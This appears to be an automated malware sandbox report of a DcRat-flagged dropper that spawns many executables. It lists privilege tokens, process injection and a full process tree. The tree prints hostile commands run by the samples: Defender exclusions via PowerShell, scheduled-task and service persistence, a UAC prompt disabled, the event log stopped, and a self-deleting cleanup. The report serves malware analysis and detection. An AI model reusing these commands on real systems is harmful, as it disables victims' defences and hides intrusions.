description pid Process Token: SeDebugPrivilege 2304 New Text Document.exe Token: SeDebugPrivilege 3904 xIPJVPDq.exe Token: SeDebugPrivilege 1532 XNuTnwMo.exe Token: SeDebugPrivilege 4400 crypted6077866846MVYQY.exe Token: SeDebugPrivilege 3932 mQxBvlTA.exe Token: SeDebugPrivilege 5100 Tester.exe Token: SeDebugPrivilege 4644 svchost.exe Token: SeBackupPrivilege 2744 vssvc.exe Token: SeRestorePrivilege 2744 vssvc.exe Token: SeAuditPrivilege 2744 vssvc.exe Token: SeDebugPrivilege 4036 powershell.exe Token: SeDebugPrivilege 3804 BrawlB0t.exe Token: SeIncreaseQuotaPrivilege 4036 powershell.exe Token: SeSecurityPrivilege 4036 powershell.exe Token: SeTakeOwnershipPrivilege 4036 powershell.exe Token: SeLoadDriverPrivilege 4036 powershell.exe Token: SeSystemProfilePrivilege 4036 powershell.exe Token: SeSystemtimePrivilege 4036 powershell.exe Token: SeProfSingleProcessPrivilege 4036 powershell.exe Token: SeIncBasePriorityPrivilege 4036 powershell.exe Token: SeCreatePagefilePrivilege 4036 powershell.exe Token: SeBackupPrivilege 4036 powershell.exe Token: SeRestorePrivilege 4036 powershell.exe Token: SeShutdownPrivilege 4036 powershell.exe Token: SeDebugPrivilege 4036 powershell.exe Token: SeSystemEnvironmentPrivilege 4036 powershell.exe Token: SeRemoteShutdownPrivilege 4036 powershell.exe Token: SeUndockPrivilege 4036 powershell.exe Token: SeManageVolumePrivilege 4036 powershell.exe Token: 33 4036 powershell.exe Token: 34 4036 powershell.exe Token: 35 4036 powershell.exe Token: 36 4036 powershell.exe Token: SeDebugPrivilege 4300 powershell.exe Token: SeIncreaseQuotaPrivilege 4300 powershell.exe Token: SeSecurityPrivilege 4300 powershell.exe Token: SeTakeOwnershipPrivilege 4300 powershell.exe Token: SeLoadDriverPrivilege 4300 powershell.exe Token: SeSystemProfilePrivilege 4300 powershell.exe Token: SeSystemtimePrivilege 4300 powershell.exe Token: SeProfSingleProcessPrivilege 4300 powershell.exe Token: SeIncBasePriorityPrivilege 4300 powershell.exe Token: SeCreatePagefilePrivilege 4300 powershell.exe Token: SeBackupPrivilege 4300 powershell.exe Token: SeRestorePrivilege 4300 powershell.exe Token: SeShutdownPrivilege 4300 powershell.exe Token: SeDebugPrivilege 4300 powershell.exe Token: SeSystemEnvironmentPrivilege 4300 powershell.exe Token: SeRemoteShutdownPrivilege 4300 powershell.exe Token: SeUndockPrivilege 4300 powershell.exe Token: SeManageVolumePrivilege 4300 powershell.exe Token: 33 4300 powershell.exe Token: 34 4300 powershell.exe Token: 35 4300 powershell.exe Token: 36 4300 powershell.exe Token: SeDebugPrivilege 4860 powershell.exe Token: SeDebugPrivilege 1576 RegSvcs.exe Token: SeIncreaseQuotaPrivilege 4860 powershell.exe Token: SeSecurityPrivilege 4860 powershell.exe Token: SeTakeOwnershipPrivilege 4860 powershell.exe Token: SeLoadDriverPrivilege 4860 powershell.exe Token: SeSystemProfilePrivilege 4860 powershell.exe Token: SeSystemtimePrivilege 4860 powershell.exe Token: SeProfSingleProcessPrivilege 4860 powershell.exe -
Suspicious use of FindShellTrayWindow 25 IoCs
pid Process 4180 wininit.exe 4180 wininit.exe 2764 medcallaboratory5.exe 2764 medcallaboratory5.exe 5012 BroomSetup.exe 5012 BroomSetup.exe 5012 BroomSetup.exe 5012 BroomSetup.exe 5012 BroomSetup.exe 5012 BroomSetup.exe 5012 BroomSetup.exe 5084 uq4.1.exe 5084 uq4.1.exe 5084 uq4.1.exe 5084 uq4.1.exe 5084 uq4.1.exe 5084 uq4.1.exe 5084 uq4.1.exe 3164 u11c.1.exe 3164 u11c.1.exe 3164 u11c.1.exe 3164 u11c.1.exe 3164 u11c.1.exe 3164 u11c.1.exe 3164 u11c.1.exe -
Suspicious use of SendNotifyMessage 25 IoCs
pid Process 4180 wininit.exe 4180 wininit.exe 2764 medcallaboratory5.exe 2764 medcallaboratory5.exe 5012 BroomSetup.exe 5012 BroomSetup.exe 5012 BroomSetup.exe 5012 BroomSetup.exe 5012 BroomSetup.exe 5012 BroomSetup.exe 5012 BroomSetup.exe 5084 uq4.1.exe 5084 uq4.1.exe 5084 uq4.1.exe 5084 uq4.1.exe 5084 uq4.1.exe 5084 uq4.1.exe 5084 uq4.1.exe 3164 u11c.1.exe 3164 u11c.1.exe 3164 u11c.1.exe 3164 u11c.1.exe 3164 u11c.1.exe 3164 u11c.1.exe 3164 u11c.1.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 4808 svchost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2304 wrote to memory of 3932 2304 New Text Document.exe 75 PID 2304 wrote to memory of 3932 2304 New Text Document.exe 75 PID 2304 wrote to memory of 3932 2304 New Text Document.exe 75 PID 2304 wrote to memory of 3904 2304 New Text Document.exe 76 PID 2304 wrote to memory of 3904 2304 New Text Document.exe 76 PID 2304 wrote to memory of 3904 2304 New Text Document.exe 76 PID 3904 wrote to memory of 1532 3904 xIPJVPDq.exe 77 PID 3904 wrote to memory of 1532 3904 xIPJVPDq.exe 77 PID 2304 wrote to memory of 4400 2304 New Text Document.exe 78 PID 2304 wrote to memory of 4400 2304 New Text Document.exe 78 PID 2304 wrote to memory of 4400 2304 New Text Document.exe 78 PID 2304 wrote to memory of 3848 2304 New Text Document.exe 80 PID 2304 wrote to memory of 3848 2304 New Text Document.exe 80 PID 2304 wrote to memory of 4180 2304 New Text Document.exe 82 PID 2304 wrote to memory of 4180 2304 New Text Document.exe 82 PID 2304 wrote to memory of 4180 2304 New Text Document.exe 82 PID 2304 wrote to memory of 2984 2304 New Text Document.exe 83 PID 2304 wrote to memory of 2984 2304 New Text Document.exe 83 PID 2304 wrote to memory of 2984 2304 New Text Document.exe 83 PID 2304 wrote to memory of 3160 2304 New Text Document.exe 84 PID 2304 wrote to memory of 3160 2304 New Text Document.exe 84 PID 2304 wrote to memory of 3160 2304 New Text Document.exe 84 PID 2304 wrote to memory of 5068 2304 New Text Document.exe 85 PID 2304 wrote to memory of 5068 2304 New Text Document.exe 85 PID 3160 wrote to memory of 4900 3160 ISetup8.exe 86 PID 3160 wrote to memory of 4900 3160 ISetup8.exe 86 PID 3160 wrote to memory of 4900 3160 ISetup8.exe 86 PID 2304 wrote to memory of 4116 2304 New Text Document.exe 88 PID 2304 wrote to memory of 4116 2304 New Text Document.exe 88 PID 2304 wrote to memory of 4876 2304 New Text Document.exe 89 PID 2304 wrote to memory of 4876 2304 New Text Document.exe 89 PID 2304 wrote to memory of 4876 2304 New Text Document.exe 89 PID 2304 wrote to memory of 5100 2304 New Text Document.exe 90 PID 2304 wrote to memory of 5100 2304 New Text Document.exe 90 PID 2304 wrote to memory of 4644 2304 New Text Document.exe 91 PID 2304 wrote to memory of 4644 2304 New Text Document.exe 91 PID 2304 wrote to memory of 1544 2304 New Text Document.exe 92 PID 2304 wrote to memory of 1544 2304 New Text Document.exe 92 PID 2304 wrote to memory of 4508 2304 New Text Document.exe 96 PID 2304 wrote to memory of 4508 2304 New Text Document.exe 96 PID 2304 wrote to memory of 4508 2304 New Text Document.exe 96 PID 5100 wrote to memory of 4036 5100 Tester.exe 97 PID 5100 wrote to memory of 4036 5100 Tester.exe 97 PID 2304 wrote to memory of 3804 2304 New Text Document.exe 99 PID 2304 wrote to memory of 3804 2304 New Text Document.exe 99 PID 5100 wrote to memory of 4300 5100 Tester.exe 101 PID 5100 wrote to memory of 4300 5100 Tester.exe 101 PID 2304 wrote to memory of 2764 2304 New Text Document.exe 103 PID 2304 wrote to memory of 2764 2304 New Text Document.exe 103 PID 2304 wrote to memory of 2764 2304 New Text Document.exe 103 PID 3804 wrote to memory of 4860 3804 BrawlB0t.exe 104 PID 3804 wrote to memory of 4860 3804 BrawlB0t.exe 104 PID 2764 wrote to memory of 1576 2764 medcallaboratory5.exe 106 PID 2764 wrote to memory of 1576 2764 medcallaboratory5.exe 106 PID 2764 wrote to memory of 1576 2764 medcallaboratory5.exe 106 PID 2764 wrote to memory of 1576 2764 medcallaboratory5.exe 106 PID 2304 wrote to memory of 2132 2304 New Text Document.exe 109 PID 2304 wrote to memory of 2132 2304 New Text Document.exe 109 PID 2304 wrote to memory of 2132 2304 New Text Document.exe 109 PID 3804 wrote to memory of 4812 3804 BrawlB0t.exe 110 PID 3804 wrote to memory of 4812 3804 BrawlB0t.exe 110 PID 3804 wrote to memory of 968 3804 BrawlB0t.exe 112 PID 3804 wrote to memory of 968 3804 BrawlB0t.exe 112 PID 3804 wrote to memory of 5048 3804 BrawlB0t.exe 114 -
System policy modification 1 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" garits.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\New Text Document.exe"C:\Users\Admin\AppData\Local\Temp\New Text Document.exe"1⤵
- DcRat
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2304 -
C:\Users\Admin\AppData\Local\Temp\a\mQxBvlTA.exe"C:\Users\Admin\AppData\Local\Temp\a\mQxBvlTA.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:3932
-
-
C:\Users\Admin\AppData\Local\Temp\a\xIPJVPDq.exe"C:\Users\Admin\AppData\Local\Temp\a\xIPJVPDq.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3904 -
C:\Users\Admin\AppData\Local\Temp\XNuTnwMo.exe"C:\Users\Admin\AppData\Local\Temp\XNuTnwMo.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1532
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\crypted6077866846MVYQY.exe"C:\Users\Admin\AppData\Local\Temp\a\crypted6077866846MVYQY.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4400
-
-
C:\Users\Admin\AppData\Local\Temp\a\i1gcbW1E.exe"C:\Users\Admin\AppData\Local\Temp\a\i1gcbW1E.exe"2⤵
- Executes dropped EXE
PID:3848
-
-
C:\Users\Admin\AppData\Local\Temp\a\wininit.exe"C:\Users\Admin\AppData\Local\Temp\a\wininit.exe"2⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4180
-
-
C:\Users\Admin\AppData\Local\Temp\a\1234.exe"C:\Users\Admin\AppData\Local\Temp\a\1234.exe"2⤵
- Executes dropped EXE
PID:2984
-
-
C:\Users\Admin\AppData\Local\Temp\a\ISetup8.exe"C:\Users\Admin\AppData\Local\Temp\a\ISetup8.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3160 -
C:\Users\Admin\AppData\Local\Temp\u2fs.0.exe"C:\Users\Admin\AppData\Local\Temp\u2fs.0.exe"3⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:4900
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\test2.exe"C:\Users\Admin\AppData\Local\Temp\a\test2.exe"2⤵
- Executes dropped EXE
PID:5068
-
-
C:\Users\Admin\AppData\Local\Temp\a\1111.exe"C:\Users\Admin\AppData\Local\Temp\a\1111.exe"2⤵
- Executes dropped EXE
PID:4116
-
-
C:\Users\Admin\AppData\Local\Temp\a\ISetup2.exe"C:\Users\Admin\AppData\Local\Temp\a\ISetup2.exe"2⤵
- Executes dropped EXE
PID:4876
-
-
C:\Users\Admin\AppData\Local\Temp\a\Tester.exe"C:\Users\Admin\AppData\Local\Temp\a\Tester.exe"2⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5100 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\svchost.exe'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4036
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4300
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\svchost.exe"C:\Users\Admin\AppData\Local\Temp\a\svchost.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4644
-
-
C:\Users\Admin\AppData\Local\Temp\a\555.exe"C:\Users\Admin\AppData\Local\Temp\a\555.exe"2⤵
- Executes dropped EXE
PID:1544
-
-
C:\Users\Admin\AppData\Local\Temp\a\Document.exe"C:\Users\Admin\AppData\Local\Temp\a\Document.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4508 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\a\Document.exe"3⤵PID:3728
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\gYVTyaODtj.exe"3⤵PID:672
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gYVTyaODtj" /XML "C:\Users\Admin\AppData\Local\Temp\tmpF368.tmp"3⤵
- DcRat
- Creates scheduled task(s)
PID:5020
-
-
C:\Users\Admin\AppData\Local\Temp\a\Document.exe"C:\Users\Admin\AppData\Local\Temp\a\Document.exe"3⤵
- Executes dropped EXE
PID:1572 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "msdtc" /tr '"C:\Users\Admin\AppData\Roaming\msdtc.exe"' & exit4⤵PID:4144
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "msdtc" /tr '"C:\Users\Admin\AppData\Roaming\msdtc.exe"'5⤵
- DcRat
- Creates scheduled task(s)
PID:4776
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp654.tmp.bat""4⤵PID:5108
-
C:\Windows\SysWOW64\timeout.exetimeout 35⤵
- Delays execution with timeout.exe
PID:2688
-
-
C:\Users\Admin\AppData\Roaming\msdtc.exe"C:\Users\Admin\AppData\Roaming\msdtc.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1904 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\msdtc.exe"6⤵PID:5112
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\gYVTyaODtj.exe"6⤵PID:2676
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gYVTyaODtj" /XML "C:\Users\Admin\AppData\Local\Temp\tmp66E3.tmp"6⤵
- DcRat
- Creates scheduled task(s)
PID:1532
-
-
C:\Users\Admin\AppData\Roaming\msdtc.exe"C:\Users\Admin\AppData\Roaming\msdtc.exe"6⤵
- Executes dropped EXE
PID:1620
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\BrawlB0t.exe"C:\Users\Admin\AppData\Local\Temp\a\BrawlB0t.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3804 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a\BrawlB0t.exe'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4860
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'BrawlB0t.exe'3⤵
- Suspicious behavior: EnumeratesProcesses
PID:4812
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\OneDrive.exe'3⤵
- Suspicious behavior: EnumeratesProcesses
PID:968
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'OneDrive.exe'3⤵
- Suspicious behavior: EnumeratesProcesses
PID:5048
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "OneDrive" /tr "C:\Users\Admin\AppData\Roaming\OneDrive.exe"3⤵
- DcRat
- Creates scheduled task(s)
PID:1932
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\medcallaboratory5.exe"C:\Users\Admin\AppData\Local\Temp\a\medcallaboratory5.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2764 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Users\Admin\AppData\Local\Temp\a\medcallaboratory5.exe"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1576
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2764 -s 6803⤵
- Program crash
PID:1744
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\securitycheck.exe"C:\Users\Admin\AppData\Local\Temp\a\securitycheck.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2132
-
-
C:\Users\Admin\AppData\Local\Temp\a\PrintSpoofer.exe"C:\Users\Admin\AppData\Local\Temp\a\PrintSpoofer.exe"2⤵
- Executes dropped EXE
PID:4332
-
-
C:\Users\Admin\AppData\Local\Temp\a\svchost.exe"C:\Users\Admin\AppData\Local\Temp\a\svchost.exe"2⤵
- Executes dropped EXE
PID:1812
-
-
C:\Users\Admin\AppData\Local\Temp\a\Retailer_prog.exe"C:\Users\Admin\AppData\Local\Temp\a\Retailer_prog.exe"2⤵
- Executes dropped EXE
PID:4276
-
-
C:\Users\Admin\AppData\Local\Temp\a\BroomSetup.exe"C:\Users\Admin\AppData\Local\Temp\a\BroomSetup.exe"2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5012 -
C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe"C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD13⤵PID:1372
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\syncUpd.exe"C:\Users\Admin\AppData\Local\Temp\a\syncUpd.exe"2⤵
- Executes dropped EXE
PID:4176
-
-
C:\Users\Admin\AppData\Local\Temp\a\Ledger-Live.exe"C:\Users\Admin\AppData\Local\Temp\a\Ledger-Live.exe"2⤵
- Executes dropped EXE
PID:4296 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C ping 2.2.2.2 -n 1 -w 3000 > Nul & Del C:\Users\Admin\AppData\Local\Temp\a\Ledger-Live.exe3⤵PID:1300
-
C:\Windows\SysWOW64\PING.EXEping 2.2.2.2 -n 1 -w 30004⤵
- Runs ping.exe
PID:4320
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\1111.exe"C:\Users\Admin\AppData\Local\Temp\a\1111.exe"2⤵
- Executes dropped EXE
PID:4984 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4984 -s 1483⤵
- Program crash
PID:2816
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\new1.exe"C:\Users\Admin\AppData\Local\Temp\a\new1.exe"2⤵
- Executes dropped EXE
- Modifies system certificate store
PID:2240
-
-
C:\Users\Admin\AppData\Local\Temp\a\swiiii.exe"C:\Users\Admin\AppData\Local\Temp\a\swiiii.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:276 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
- Loads dropped DLL
- Checks processor information in registry
PID:692
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\ISetup5.exe"C:\Users\Admin\AppData\Local\Temp\a\ISetup5.exe"2⤵
- Executes dropped EXE
PID:940 -
C:\Users\Admin\AppData\Local\Temp\uq4.0.exe"C:\Users\Admin\AppData\Local\Temp\uq4.0.exe"3⤵
- Executes dropped EXE
PID:5068
-
-
C:\Users\Admin\AppData\Local\Temp\uq4.1.exe"C:\Users\Admin\AppData\Local\Temp\uq4.1.exe"3⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5084
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\mstsc.exe"C:\Users\Admin\AppData\Local\Temp\a\mstsc.exe"2⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:5008 -
C:\Program Files (x86)\Microsoft Jufbhx\Jufrxnb.exe"C:\Program Files (x86)\Microsoft Jufbhx\Jufrxnb.exe"3⤵
- Executes dropped EXE
PID:2100
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\crypted_097f1784.exe"C:\Users\Admin\AppData\Local\Temp\a\crypted_097f1784.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1888 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:4636
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1888 -s 7963⤵
- Program crash
PID:3044
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\june.exe"C:\Users\Admin\AppData\Local\Temp\a\june.exe"2⤵
- Executes dropped EXE
PID:4420 -
C:\Users\Admin\AppData\Local\Temp\is-V6MTV.tmp\june.tmp"C:\Users\Admin\AppData\Local\Temp\is-V6MTV.tmp\june.tmp" /SL5="$902D2,4053053,54272,C:\Users\Admin\AppData\Local\Temp\a\june.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1428 -
C:\Users\Admin\AppData\Local\Sun Vox\sunvox32.exe"C:\Users\Admin\AppData\Local\Sun Vox\sunvox32.exe" -i4⤵
- Executes dropped EXE
PID:2020
-
-
C:\Users\Admin\AppData\Local\Sun Vox\sunvox32.exe"C:\Users\Admin\AppData\Local\Sun Vox\sunvox32.exe" -s4⤵
- Executes dropped EXE
PID:608
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\crypted_33cb9091.exe"C:\Users\Admin\AppData\Local\Temp\a\crypted_33cb9091.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3264 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:2020
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3264 -s 7963⤵
- Program crash
PID:1876
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\new.exe"C:\Users\Admin\AppData\Local\Temp\a\new.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3244 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:4640
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\ttt01.exe"C:\Users\Admin\AppData\Local\Temp\a\ttt01.exe"2⤵
- Executes dropped EXE
- Writes to the Master Boot Record (MBR)
PID:496
-
-
C:\Users\Admin\AppData\Local\Temp\a\123p.exe"C:\Users\Admin\AppData\Local\Temp\a\123p.exe"2⤵
- Executes dropped EXE
PID:3944 -
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 03⤵PID:1552
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 03⤵PID:3984
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 03⤵PID:2180
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 03⤵PID:3972
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "OBGPQMHF"3⤵
- Launches sc.exe
PID:1584
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "OBGPQMHF" binpath= "C:\ProgramData\ndfbaljqaqzm\dckuybanmlgp.exe" start= "auto"3⤵
- Launches sc.exe
PID:1288
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog3⤵
- Launches sc.exe
PID:4460
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "OBGPQMHF"3⤵
- Launches sc.exe
PID:5040
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\IjerkOff.exe"C:\Users\Admin\AppData\Local\Temp\a\IjerkOff.exe"2⤵
- Executes dropped EXE
- Modifies registry class
PID:4876 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\BlockComponentwebMonitordhcp\AbAw8xfGFsmxdxvuwvbKubDJeV.vbe"3⤵PID:1584
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\BlockComponentwebMonitordhcp\8H5kf2bUK2r.bat" "4⤵PID:520
-
C:\BlockComponentwebMonitordhcp\agentDllDhcp.exe"C:\BlockComponentwebMonitordhcp\agentDllDhcp.exe"5⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Drops file in Windows directory
PID:2100 -
C:\Program Files\Windows Security\BrowserCore\en-US\New Text Document.exe"C:\Program Files\Windows Security\BrowserCore\en-US\New Text Document.exe"6⤵
- Executes dropped EXE
PID:1904
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\ISetup1.exe"C:\Users\Admin\AppData\Local\Temp\a\ISetup1.exe"2⤵
- Executes dropped EXE
PID:1344 -
C:\Users\Admin\AppData\Local\Temp\u11c.0.exe"C:\Users\Admin\AppData\Local\Temp\u11c.0.exe"3⤵
- Executes dropped EXE
PID:4692
-
-
C:\Users\Admin\AppData\Local\Temp\u11c.1.exe"C:\Users\Admin\AppData\Local\Temp\u11c.1.exe"3⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3164
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\diufhloadme.exe"C:\Users\Admin\AppData\Local\Temp\a\diufhloadme.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4384 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe3⤵PID:2260
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /c mkdir "C:\Users\Admin\AppData\Roaming\grhgjhjh"3⤵PID:5040
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\grhgjhjh\grhgjhjh.exe'" /f3⤵PID:3472
-
C:\Windows\system32\schtasks.exeschtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\grhgjhjh\grhgjhjh.exe'" /f4⤵
- DcRat
- Creates scheduled task(s)
PID:372
-
-
-
